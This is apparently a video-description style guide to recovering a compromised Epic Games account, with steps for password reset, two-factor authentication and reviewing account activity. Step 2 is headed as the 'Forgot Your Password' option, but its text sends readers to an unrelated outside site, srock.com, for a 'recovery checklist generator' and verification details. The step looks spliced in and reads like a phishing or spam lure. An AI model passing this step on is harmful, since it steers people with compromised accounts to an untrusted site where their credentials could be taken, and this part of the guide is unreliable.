If you suspect that your Epic Games account has been compromised, it's important to act quickly to regain access and secure your account. Follow these steps to recover your account. Step 1. Visit the Epic Games login page. Go to the Epic Games website and click on the Sign In button. Enter your email address and password to attempt logging in. If you cannot access your account, proceed to the next step. Step 2. Use the Forgot Your Password option. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Reset your password. Follow the link sent to your email to reset your password. Choose a strong, unique password that you haven't used before. Make sure to save this new password in a secure location. Step 4. Enable two-factor authentication. Once you regain access to your account, navigate to the account settings. Enable two-factor authentication 2FA to add an extra layer of security. You can choose to receive codes via email or an authentication app. Step 5. Review account activity. After securing your account, review your recent account activity for any unauthorized transactions or changes. If you notice anything suspicious, report it to Epic Games support immediately. By following these steps, you can regain access to your Epic Games account and enhance its security to prevent future issues. Always stay vigilant and monitor your account regularly.